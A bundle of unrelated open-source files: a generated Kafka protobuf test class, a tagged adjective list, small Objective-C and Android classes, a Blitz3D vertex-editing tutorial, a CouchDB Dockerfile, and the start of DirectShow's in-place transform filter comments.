return io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage.getDefaultInstance();
}
@java.lang.Override
public io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage build() {
io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage result = buildPartial();
if (!result.isInitialized()) {
throw newUninitializedMessageException(result);
}
return result;
}
@java.lang.Override
public io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage buildPartial() {
io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage result = new io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage(this);
if (nestedMessageBuilder_ == null) {
result.nestedMessage_ = nestedMessage_;
} else {
result.nestedMessage_ = nestedMessageBuilder_.build();
}
result.isActive_ = isActive_;
if (testMesssageBuilder_ == null) {
result.testMesssage_ = testMesssage_;
} else {
result.testMesssage_ = testMesssageBuilder_.build();
}
onBuilt();
return result;
}
@java.lang.Override
public Builder clone() {
return super.clone();
}
@java.lang.Override
public Builder setField(
com.google.protobuf.Descriptors.FieldDescriptor field,
java.lang.Object value) {
return super.setField(field, value);
}
@java.lang.Override
public Builder clearField(
com.google.protobuf.Descriptors.FieldDescriptor field) {
return super.clearField(field);
}
@java.lang.Override
public Builder clearOneof(
com.google.protobuf.Descriptors.OneofDescriptor oneof) {
return super.clearOneof(oneof);
}
@java.lang.Override
public Builder setRepeatedField(
com.google.protobuf.Descriptors.FieldDescriptor field,
int index, java.lang.Object value) {
return super.setRepeatedField(field, index, value);
}
@java.lang.Override
public Builder addRepeatedField(
com.google.protobuf.Descriptors.FieldDescriptor field,
java.lang.Object value) {
return super.addRepeatedField(field, value);
}
@java.lang.Override
public Builder mergeFrom(com.google.protobuf.Message other) {
if (other instanceof io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage) {
return mergeFrom((io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage)other);
} else {
super.mergeFrom(other);
return this;
}
}
public Builder mergeFrom(io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage other) {
if (other == io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage.getDefaultInstance()) return this;
if (other.hasNestedMessage()) {
mergeNestedMessage(other.getNestedMessage());
}
if (other.getIsActive() != false) {
setIsActive(other.getIsActive());
}
if (other.hasTestMesssage()) {
mergeTestMesssage(other.getTestMesssage());
}
this.mergeUnknownFields(other.unknownFields);
onChanged();
return this;
}
@java.lang.Override
public final boolean isInitialized() {
return true;
}
@java.lang.Override
public Builder mergeFrom(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage parsedMessage = null;
try {
parsedMessage = PARSER.parsePartialFrom(input, extensionRegistry);
} catch (com.google.protobuf.InvalidProtocolBufferException e) {
parsedMessage = (io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage) e.getUnfinishedMessage();
throw e.unwrapIOException();
} finally {
if (parsedMessage != null) {
mergeFrom(parsedMessage);
}
}
return this;
}
private io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage nestedMessage_;
private com.google.protobuf.SingleFieldBuilderV3<
io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage, io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage.Builder, io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessageOrBuilder> nestedMessageBuilder_;
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.NestedMessage nested_message = 1;</code>
* @return Whether the nestedMessage field is set.
*/
public boolean hasNestedMessage() {
return nestedMessageBuilder_ != null || nestedMessage_ != null;
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.NestedMessage nested_message = 1;</code>
* @return The nestedMessage.
*/
public io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage getNestedMessage() {
if (nestedMessageBuilder_ == null) {
return nestedMessage_ == null ? io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage.getDefaultInstance() : nestedMessage_;
} else {
return nestedMessageBuilder_.getMessage();
}
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.NestedMessage nested_message = 1;</code>
*/
public Builder setNestedMessage(io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage value) {
if (nestedMessageBuilder_ == null) {
if (value == null) {
throw new NullPointerException();
}
nestedMessage_ = value;
onChanged();
} else {
nestedMessageBuilder_.setMessage(value);
}
return this;
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.NestedMessage nested_message = 1;</code>
*/
public Builder setNestedMessage(
io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage.Builder builderForValue) {
if (nestedMessageBuilder_ == null) {
nestedMessage_ = builderForValue.build();
onChanged();
} else {
nestedMessageBuilder_.setMessage(builderForValue.build());
}
return this;
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.NestedMessage nested_message = 1;</code>
*/
public Builder mergeNestedMessage(io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage value) {
if (nestedMessageBuilder_ == null) {
if (nestedMessage_ != null) {
nestedMessage_ =
io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage.newBuilder(nestedMessage_).mergeFrom(value).buildPartial();
} else {
nestedMessage_ = value;
}
onChanged();
} else {
nestedMessageBuilder_.mergeFrom(value);
}
return this;
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.NestedMessage nested_message = 1;</code>
*/
public Builder clearNestedMessage() {
if (nestedMessageBuilder_ == null) {
nestedMessage_ = null;
onChanged();
} else {
nestedMessage_ = null;
nestedMessageBuilder_ = null;
}
return this;
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.NestedMessage nested_message = 1;</code>
*/
public io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage.Builder getNestedMessageBuilder() {
onChanged();
return getNestedMessageFieldBuilder().getBuilder();
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.NestedMessage nested_message = 1;</code>
*/
public io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessageOrBuilder getNestedMessageOrBuilder() {
if (nestedMessageBuilder_ != null) {
return nestedMessageBuilder_.getMessageOrBuilder();
} else {
return nestedMessage_ == null ?
io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage.getDefaultInstance() : nestedMessage_;
}
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.NestedMessage nested_message = 1;</code>
*/
private com.google.protobuf.SingleFieldBuilderV3<
io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage, io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage.Builder, io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessageOrBuilder>
getNestedMessageFieldBuilder() {
if (nestedMessageBuilder_ == null) {
nestedMessageBuilder_ = new com.google.protobuf.SingleFieldBuilderV3<
io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage, io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage.Builder, io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessageOrBuilder>(
getNestedMessage(),
getParentForChildren(),
isClean());
nestedMessage_ = null;
}
return nestedMessageBuilder_;
}
private boolean isActive_ ;
/**
* <code>bool is_active = 2;</code>
* @return The isActive.
*/
public boolean getIsActive() {
return isActive_;
}
/**
* <code>bool is_active = 2;</code>
* @param value The isActive to set.
* @return This builder for chaining.
*/
public Builder setIsActive(boolean value) {
isActive_ = value;
onChanged();
return this;
}
/**
* <code>bool is_active = 2;</code>
* @return This builder for chaining.
*/
public Builder clearIsActive() {
isActive_ = false;
onChanged();
return this;
}
private io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage testMesssage_;
private com.google.protobuf.SingleFieldBuilderV3<
io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage, io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage.Builder, io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessageOrBuilder> testMesssageBuilder_;
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.TestMessage test_messsage = 3;</code>
* @return Whether the testMesssage field is set.
*/
public boolean hasTestMesssage() {
return testMesssageBuilder_ != null || testMesssage_ != null;
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.TestMessage test_messsage = 3;</code>
* @return The testMesssage.
*/
public io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage getTestMesssage() {
if (testMesssageBuilder_ == null) {
return testMesssage_ == null ? io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage.getDefaultInstance() : testMesssage_;
} else {
return testMesssageBuilder_.getMessage();
}
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.TestMessage test_messsage = 3;</code>
*/
public Builder setTestMesssage(io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage value) {
if (testMesssageBuilder_ == null) {
if (value == null) {
throw new NullPointerException();
}
testMesssage_ = value;
onChanged();
} else {
testMesssageBuilder_.setMessage(value);
}
return this;
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.TestMessage test_messsage = 3;</code>
*/
public Builder setTestMesssage(
io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage.Builder builderForValue) {
if (testMesssageBuilder_ == null) {
testMesssage_ = builderForValue.build();
onChanged();
} else {
testMesssageBuilder_.setMessage(builderForValue.build());
}
return this;
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.TestMessage test_messsage = 3;</code>
*/
public Builder mergeTestMesssage(io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage value) {
if (testMesssageBuilder_ == null) {
if (testMesssage_ != null) {
testMesssage_ =
io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage.newBuilder(testMesssage_).mergeFrom(value).buildPartial();
} else {
testMesssage_ = value;
}
onChanged();
} else {
testMesssageBuilder_.mergeFrom(value);
}
return this;
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.TestMessage test_messsage = 3;</code>
*/
public Builder clearTestMesssage() {
if (testMesssageBuilder_ == null) {
testMesssage_ = null;
onChanged();
} else {
testMesssage_ = null;
testMesssageBuilder_ = null;
}
return this;
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.TestMessage test_messsage = 3;</code>
*/
public io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage.Builder getTestMesssageBuilder() {
onChanged();
return getTestMesssageFieldBuilder().getBuilder();
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.TestMessage test_messsage = 3;</code>
*/
public io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessageOrBuilder getTestMesssageOrBuilder() {
if (testMesssageBuilder_ != null) {
return testMesssageBuilder_.getMessageOrBuilder();
} else {
return testMesssage_ == null ?
io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage.getDefaultInstance() : testMesssage_;
}
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.TestMessage test_messsage = 3;</code>
*/
private com.google.protobuf.SingleFieldBuilderV3<
io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage, io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage.Builder, io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessageOrBuilder>
getTestMesssageFieldBuilder() {
if (testMesssageBuilder_ == null) {
testMesssageBuilder_ = new com.google.protobuf.SingleFieldBuilderV3<
io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage, io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage.Builder, io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessageOrBuilder>(
getTestMesssage(),
getParentForChildren(),
isClean());
testMesssage_ = null;
}
return testMesssageBuilder_;
}
@java.lang.Override
public final Builder setUnknownFields(
final com.google.protobuf.UnknownFieldSet unknownFields) {
return super.setUnknownFields(unknownFields);
}
@java.lang.Override
public final Builder mergeUnknownFields(
final com.google.protobuf.UnknownFieldSet unknownFields) {
return super.mergeUnknownFields(unknownFields);
}
// @@protoc_insertion_point(builder_scope:io.confluent.kafka.serializers.protobuf.test.DependencyMessage)
}
// @@protoc_insertion_point(class_scope:io.confluent.kafka.serializers.protobuf.test.DependencyMessage)
private static final io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage DEFAULT_INSTANCE;
static {
DEFAULT_INSTANCE = new io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage();
}
public static io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage getDefaultInstance() {
return DEFAULT_INSTANCE;
}
private static final com.google.protobuf.Parser<DependencyMessage>
PARSER = new com.google.protobuf.AbstractParser<DependencyMessage>() {
@java.lang.Override
public DependencyMessage parsePartialFrom(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return new DependencyMessage(input, extensionRegistry);
}
};
public static com.google.protobuf.Parser<DependencyMessage> parser() {
return PARSER;
}
@java.lang.Override
public com.google.protobuf.Parser<DependencyMessage> getParserForType() {
return PARSER;
}
@java.lang.Override
public io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage getDefaultInstanceForType() {
return DEFAULT_INSTANCE;
}
}
private static final com.google.protobuf.Descriptors.Descriptor
internal_static_io_confluent_kafka_serializers_protobuf_test_DependencyMessage_descriptor;
private static final
com.google.protobuf.GeneratedMessageV3.FieldAccessorTable
internal_static_io_confluent_kafka_serializers_protobuf_test_DependencyMessage_fieldAccessorTable;
public static com.google.protobuf.Descriptors.FileDescriptor
getDescriptor() {
return descriptor;
}
private static com.google.protobuf.Descriptors.FileDescriptor
descriptor;
static {
java.lang.String[] descriptorData = {
"\n\031DependencyTestProto.proto\022,io.confluen" +
"t.kafka.serializers.protobuf.test\032\025Neste" +
"dTestProto.proto\032\025PublicTestProto.proto\"" +
"\315\001\n\021DependencyMessage\022S\n\016nested_message\030" +
"\001 \001(\0132;.io.confluent.kafka.serializers.p" +
"rotobuf.test.NestedMessage\022\021\n\tis_active\030" +
"\002 \001(\010\022P\n\rtest_messsage\030\003 \001(\01329.io.conflu" +
"ent.kafka.serializers.protobuf.test.Test" +
"MessageB.\n,io.confluent.kafka.serializer" +
"s.protobuf.testb\006proto3"
};
descriptor = com.google.protobuf.Descriptors.FileDescriptor
.internalBuildGeneratedFileFrom(descriptorData,
new com.google.protobuf.Descriptors.FileDescriptor[] {
io.confluent.kafka.serializers.protobuf.test.NestedTestProto.getDescriptor(),
io.confluent.kafka.serializers.protobuf.test.PublicTestProto.getDescriptor(),
});
internal_static_io_confluent_kafka_serializers_protobuf_test_DependencyMessage_descriptor =
getDescriptor().getMessageTypes().get(0);
internal_static_io_confluent_kafka_serializers_protobuf_test_DependencyMessage_fieldAccessorTable = new
com.google.protobuf.GeneratedMessageV3.FieldAccessorTable(
internal_static_io_confluent_kafka_serializers_protobuf_test_DependencyMessage_descriptor,
new java.lang.String[] { "NestedMessage", "IsActive", "TestMesssage", });
io.confluent.kafka.serializers.protobuf.test.NestedTestProto.getDescriptor();
io.confluent.kafka.serializers.protobuf.test.PublicTestProto.getDescriptor();
}
// @@protoc_insertion_point(outer_class_scope)
}
| {
"pile_set_name": "Github"
} |
well-respected_JJ
difficult_JJ
simple_JJ
powerful_JJ
fearless_JJ
post-traumatic_JJ
now-tired_JJ
underrated_JJ
aware_JJ
voyeuristic_JJ
genuine_JJ
fictitious_JJ
hometown_JJ
fake_JJ
given_JJ
free_JJ
sunny_JJ
long_JJ
lost_JJ
trying_JJ
hard_JJ
seahaven_JJ
intact_JJ
broad_JJ
convincing_JJ
good_JJ
human_JJ
nice_JJ
interactive_JJ
surrealistic_JJ
plausible_JJ
tight_JJ
sympathetic_JJ
facial_JJ
credible_JJ
wide-eyed_JJ
impeccable_JJ
symbolic_JJ
kilar_JJ
incomplete_JJ
stupendous_JJ
wonderful_JJ
loyal_JJ
inspired_JJ
| {
"pile_set_name": "Github"
} |
//
// YYSentinel.m
// YYKit <https://github.com/ibireme/YYKit>
//
// Created by ibireme on 15/4/13.
// Copyright (c) 2015 ibireme.
//
// This source code is licensed under the MIT-style license found in the
// LICENSE file in the root directory of this source tree.
//
#import "YYSentinel.h"
#import <libkern/OSAtomic.h>
@implementation YYSentinel {
int32_t _value;
}
- (int32_t)value {
return _value;
}
- (int32_t)increase {
return OSAtomicIncrement32(&_value);
}
@end
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2017 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.android.setupwizardlib.view;
import android.annotation.TargetApi;
import android.content.Context;
import android.os.Build.VERSION_CODES;
import android.util.AttributeSet;
import android.widget.Checkable;
import android.widget.LinearLayout;
import androidx.annotation.Nullable;
/**
* A LinearLayout which is checkable. This will set the checked state when
* {@link #onCreateDrawableState(int)} is called, and can be used with
* {@code android:duplicateParentState} to propagate the drawable state to child views.
*/
public class CheckableLinearLayout extends LinearLayout implements Checkable {
private boolean mChecked = false;
public CheckableLinearLayout(Context context) {
super(context);
}
public CheckableLinearLayout(Context context, @Nullable AttributeSet attrs) {
super(context, attrs);
}
@TargetApi(VERSION_CODES.HONEYCOMB)
public CheckableLinearLayout(
Context context,
@Nullable AttributeSet attrs,
int defStyleAttr) {
super(context, attrs, defStyleAttr);
}
@TargetApi(VERSION_CODES.LOLLIPOP)
public CheckableLinearLayout(
Context context,
AttributeSet attrs,
int defStyleAttr,
int defStyleRes) {
super(context, attrs, defStyleAttr, defStyleRes);
}
{
setFocusable(true);
}
@Override
protected int[] onCreateDrawableState(int extraSpace) {
if (mChecked) {
final int[] superStates = super.onCreateDrawableState(extraSpace + 1);
final int[] checked = new int[] { android.R.attr.state_checked };
return mergeDrawableStates(superStates, checked);
} else {
return super.onCreateDrawableState(extraSpace);
}
}
@Override
public void setChecked(boolean checked) {
mChecked = checked;
refreshDrawableState();
}
@Override
public boolean isChecked() {
return mChecked;
}
@Override
public void toggle() {
setChecked(!isChecked());
}
}
| {
"pile_set_name": "Github"
} |
<font face="verdana">
<table border="1" width="100%" bordercolor="#FFFFFF">
<tr>
<td width="61%" bgcolor="#6097C9"><font face="verdana">
<h1 align="left"><font color="#FFFFFF"> Vertexes</font></h1>
<p align="left"><b> Aim</b>: To edit a meshes vertexes in Real-time<br>
<b>Skill level</b>: Intermediate<br>
<b>Files Needed</b>: vertex.bb / plane.3ds</font>
<p> </td>
<td width="5%"> </td>
<td width="34%">
<p align="center"><font face="verdana">
<img src="10c.jpg" alt="Movement" width="167" height="127" align="right">
</font>
</p>
</td>
</tr>
</table>
<p>
If you've already read the section on Meshes beforehand then hopefully you'll
know most of what we will be doing already in this tutorial, if not - go away
and read it first !.</p>
<p>
let's recap:</p>
<ul>
<li>Each <b>MESH</b> (a 3d object), is made up of SURFACES.<br>
</li>
<li>Each <b>SURFACE</b> has a BRUSH.<br>
</li>
<li>Each <b>BRUSH</b> can be assigned 8 different texturemaps.<br>
(which can be overlaid on each other to create new effects)<br>
</li>
<li>Each SURFACE is made up of TRIANGLES.<br>
</li>
<li>Each <b>TRIANGLE</b> is made up of 3 VERTEXES.</li>
</ul>
<p>So, armed with that info - you should know what makes a 3d object tick !.
Lets take a flat square as an example, it is made up of 4 vertexes and 2
triangles. What we are planning of doing is to take 2 of those vertexes and
change their coordinates.<br>
</p>
<p>Infact as mentioned in the Introduction to Meshes, we can even change the
colour of the vertexes in realtime too. Run the example - what you can hopefully
see is a square object (which is slowly spinning on the Z plane), being pulled
out of shape in 2 corners - while every-so-often the colours change.</p>
<p>It's a very easy effect to create, I wont go into great detail about how/why
the program works - but here's a quick rundown if your interested:</p>
<p>We setup the variable 'COUNTER', which does exactly that.. to be used as a
counter. Every time the program runs through its main loop, it is incremented.
Based on what value the counter is equal to, corresponds to what direction we
should pull the vertexes. If the counter reaches 1000 then change the colour of
each vertex to a random selection, before resetting the counter value.</p>
<p>Let's take a look:</p>
<table border="1" width="86%" bordercolor="#FFFFFF">
<tr>
<td width="14%"> </td>
<td width="72%" bordercolor="#000000" bgcolor="#C0C0C0"> <br>
</font>
<font face="arial">Graphics3D 800,600<br>
<br>
SetBuffer BackBuffer()<br>
<br>
camera=CreateCamera()<br>
CameraViewport camera,0,0,800,600<br>
<br>
light=CreateLight()<br>
<br>
plane=LoadMesh("plane.3ds")<br>
PositionEntity plane,0,0,25<br>
EntityFX plane,2<br>
<br>
surface=GetSurface(plane,CountSurfaces(plane))<br>
<br>
VertexColor surface,0,255,0,0<br>
VertexColor surface,1,0,255,0<br>
VertexColor surface,2,0,0,255<br>
VertexColor surface,3,255,0,255<br>
<br>
While Not KeyHit(1)<br>
<br>
TurnEntity plane,0,0,.3<br>
<br>
counter=counter+1<br>
<br>
If counter<500 Then <br>
x1#=-.01<br>
y1#=-.01<br>
x2#=+.01<br>
EndIf<br>
<br>
If counter>499 Then<br>
x1#=+.01<br>
y1#=+.01<br>
x2#=-.01<br>
EndIf<br>
<br>
xx#=VertexX(surface,0)<br>
yy#=VertexY(surface,0)<br>
zz#=VertexZ(surface,0)<br>
<br>
VertexCoords surface,0,xx+x1,yy+y1,zz<br>
<br>
xx#=VertexX(surface,2)<br>
yy#=VertexY(surface,2)<br>
zz#=VertexZ(surface,2)<br>
<br>
VertexCoords surface,2,xx+x2,yy+y1,zz<br>
<br>
If counter=1000 Then<br>
counter=0<br>
VertexColor surface,0,Rnd#(0,255),Rnd#(0,255),Rnd#(0,255)<br>
VertexColor surface,1,Rnd#(0,255),Rnd#(0,255),Rnd#(0,255)<br>
VertexColor surface,2,Rnd#(0,255),Rnd#(0,255),Rnd#(0,255)<br>
VertexColor surface,3,Rnd#(0,255),Rnd#(0,255),Rnd#(0,255)<br>
EndIf<br>
<br>
UpdateWorld<br>
RenderWorld<br>
<br>
Text 350,500,"Vertex Control"<br>
<br>
Flip<br>
<br>
Wend<br>
End<br><br></font>
</td>
<td width="14%"> </td>
</tr>
</table>
<p>
So how do we get at the vertexes of the object ?</p>
<p>
Well for starters we load the object with the LoadMesh command, the object we
are loading is of course called Plane.3ds.</p>
<table border="0" width="100%" bgcolor="#6097C9">
<tr>
<td width="100%">
<b><font face="Arial">EntityFX plane,2</font></b></td>
</tr>
</table>
<font face="verdana">
<p>Now here's a new command we haven't seen before !, this command is really
more of mode switch than anything else. But setting values we can access the
entity in different ways. the mode value '2' is to able vertex colouring on the
whole entity, by default this is turned off.</p>
<p>Here's those mode settings:</p>
</font>
<table border="0" width="100%" bgcolor="#FFFF00">
<tr>
<td width="100%">
<font face="Arial"><i>1 = Full-Bright<br>
2 = Use Vertex Colours<br>
4 = Flatshading<br>
8 = Disable Fog</i></font></td>
</tr>
</table>
<font face="verdana">
<p>There is another command very similar to EntitiyFX called BRUSHFX. This uses
the same mode settings, but instead of changing the whole entity will work on a
single brush. (remember a mesh has surfaces, with brushes applied to them)</p>
</font>
<table border="0" width="100%" bgcolor="#6097C9">
<tr>
<td width="100%">
<b><font face="Arial">surface=GetSurface(plane,CountSurfaces(plane))</font></b></td>
</tr>
</table>
<font face="verdana">
<p>
In order to get at the vertexes we must first unlock them, we do this by
creating a pointer variable that holds the memory address to the surfaces on the
mesh.</p>
<p>
Calm down !, we don't have to get our hands dirty calling with lots of nasty math's
- instead we just use the GETSURFACE command, which likes us to pass firstly the
mesh name - and secondly the amount of surfaces it has. As you can see I've
cheated and used the COUNTSURFACES command to do this for me.</p>
</font>
<table border="0" width="100%" bgcolor="#6097C9">
<tr>
<td width="100%">
<font face="Arial"><b>VertexColor surface,0,255,0,0<br>
VertexColor surface,1,0,255,0<br>
VertexColor surface,2,0,0,255<br>
VertexColor surface,3,255,0,255</b></font>
</td>
</tr>
</table>
<font face="verdana">
<p>Before going into the main loop, I've set the colour of each vertex to a
different colour. This gives us a nice rainbow effect !. As you can see we pass
the pointer variable SURFACE to the VERTEXCOLOR command, as well as the vertex
number (0-3, since our object only has 4 points) - followed by the colour values
for the Red, Green and Blue shades. (must be in the range of 0 (Dark) through to
255 (Light))</p>
</font>
<table border="0" width="100%" bgcolor="#6097C9">
<tr>
<td width="100%">
<font face="Arial"><b>xx#=VertexX(surface,0)<br>
yy#=VertexY(surface,0)<br>
zz#=VertexZ(surface,0)</b></font>
</td>
</tr>
</table>
<font face="verdana">
<p>Since I want the coordinates of the mesh to change all the time, I cant set
it with a value that doesn't change. Every update I've got to get the current
coordinates and slightly update them (by adding an offset to the X and Y coords).</p>
<p>I do this by firstly, getting the current X,Y and Z vertex coords - using the
various get vertex commands.</p>
<p>VertexX(surface,0) - gives us access to the X coordinate of the object
surface, at vertex 0.</p>
<p>Just as, VertexY(surface,99) - would give us access to the Y coodinate of
vertex 99 !!!.</p>
<table border="0" width="100%" bgcolor="#6097C9">
<tr>
<td width="100%">
<font face="Arial"><b>VertexCoords surface,0,xx+x1,yy+y1,zz</b></font>
</td>
</tr>
</table>
<p>
As you've probably worked out by now, this is the main instruction for changing
the actual Vertex positions. It needs to be called with the Surface pointer
value, followed by the new values for the X, Y and Z positions.</p>
<p>
And that's all there is to it !!</p>
<p>
But why would you want to change the coordinates ?</p>
<p>
All games will alter their objects, its just a case of working out how, and
where they do it. Imagine you've just written a driving simulation.. wouldn't it
be nice when you crash the car to reflect the damage ?. Perhaps crumple that
fender.. or crack that window.</p>
<p>
Just like a certain other car game currently in the charts, they use exactly the
same method. You gotta hand it to B3D - You want it.. it's there, now go and use it wisely !.</p>
<p align="center"><font color="#808080"><b>More Tutorials to follow..</b><br>
Tutorials written by Paul Gerfen<br>
(c) 2001GameCodingUK
</font> | {
"pile_set_name": "Github"
} |
FROM couchdb:3
COPY local.ini /opt/couchdb/etc/
| {
"pile_set_name": "Github"
} |
//------------------------------------------------------------------------------
// File: TransIP.cpp
//
// Desc: DirectShow base classes - implements class for simple Transform-
// In-Place filters such as audio.
//
// Copyright (c) 1992-2001 Microsoft Corporation. All rights reserved.
//------------------------------------------------------------------------------
// How allocators are decided.
//
// An in-place transform tries to do its work in someone else's buffers.
// It tries to persuade the filters on either side to use the same allocator
// (and for that matter the same media type). In desperation, if the downstream
// filter refuses to supply an allocator and the upstream filter offers only
// a read-only one then it will provide an allocator.
// if the upstream filter insists on a read-only allocator then the transform
// filter will (reluctantly) copy the data before transforming it.
//
// In order to pass an allocator through it needs to remember the one it got
// from the first connection to pass it on to the second one.
//
// It is good if we can avoid insisting on a particular order of connection
// (There is a precedent for insisting on the input
// being connected first. Insisting on the output being connected first is
// not allowed. That would break RenderFile.)
//
// The base pin classes (CBaseOutputPin and CBaseInputPin) both have a
// m_pAllocator member which is used in places like
// CBaseOutputPin::GetDeliveryBuffer and CBaseInputPin::Inactive.
// To avoid lots of extra overriding, we should keep these happy
// by using these pointers.
//
// When each pin is connected, it will set the corresponding m_pAllocator
// and will have a single ref-count on that allocator.
//
// Refcounts are acquired by GetAllocator calls which return AddReffed
// allocators and are released in one of:
// CBaseInputPin::Disconnect
// CBaseOutputPin::BreakConect
// In each case m_pAllocator is set to NULL after the release, so this
// is the last chance to ever release it. If there should ever be
// multiple refcounts associated with the same pointer, this had better
// be cleared up before that happens. To avoid such problems, we'll
// stick with one per pointer.
// RECONNECTING and STATE CHANGES
//
// Each pin could be disconnected, connected with a read-only allocator,
// connected with an upstream read/write allocator, connected with an
// allocator from downstream or connected with its own allocator.
// Five states for each pin gives a data space of 25 states.
//
// Notation:
//
// R/W == read/write
// R-O == read-only
//
// <input pin state> <output pin state> <comments>
//
// 00 means an unconnected pin.
// <- means using a R/W allocator from the upstream filter
// <= means using a R-O allocator from an upstream filter
// || means using our own (R/W) allocator.
// -> means using a R/W allocator from a downstream filter
// (a R-O allocator from downstream is nonsense, it can't ever work).
//
//
// That makes 25 possible states. Some states are nonsense (two different
// allocators from the same place). These are just an artifact of the notation.
// <= <- Nonsense.
// <- <= Nonsense
// Some states are illegal (the output pin never accepts a R-O allocator):
// 00 <= !! Error !!
// <= <= !! Error !!
// || <= !! Error !!
// -> <= !! Error !!
// Three states appears to be inaccessible:
// -> || Inaccessible
// || -> Inaccessible
// || <- Inaccessible
// Some states only ever occur as intermediates with a pending reconnect which
// is guaranteed to finish in another state.
// -> 00 ?? unstable goes to || 00
// 00 <- ?? unstable goes to 00 ||
// -> <- ?? unstable goes to -> ->
// <- || ?? unstable goes to <- <-
// <- -> ?? unstable goes to <- <-
// And that leaves 11 possible resting states:
// 1 00 00 Nothing connected.
// 2 <- 00 Input pin connected.
// 3 <= 00 Input pin connected using R-O allocator.
// 4 || 00 Needs several state changes to get here.
// 5 00 || Output pin connected using our allocator
// 6 00 -> Downstream only connected
// 7 || || Undesirable but can be forced upon us.
// 8 <= || Copy forced. <= -> is preferable
// 9 <= -> OK - forced to copy.
// 10 <- <- Transform in place (ideal)
// 11 -> -> Transform in place (ideal)
//
// The object of the exercise is to ensure that we finish up in states
// 10 or 11 whenever possible. State 10 is only possible if the upstream
// filter has a R/W allocator (the AVI splitter notoriously
// doesn't) and state 11 is only possible if the downstream filter does
// offer an allocator.
//
// The transition table (entries marked * go via a reconnect)
//
// There are 8 possible transitions:
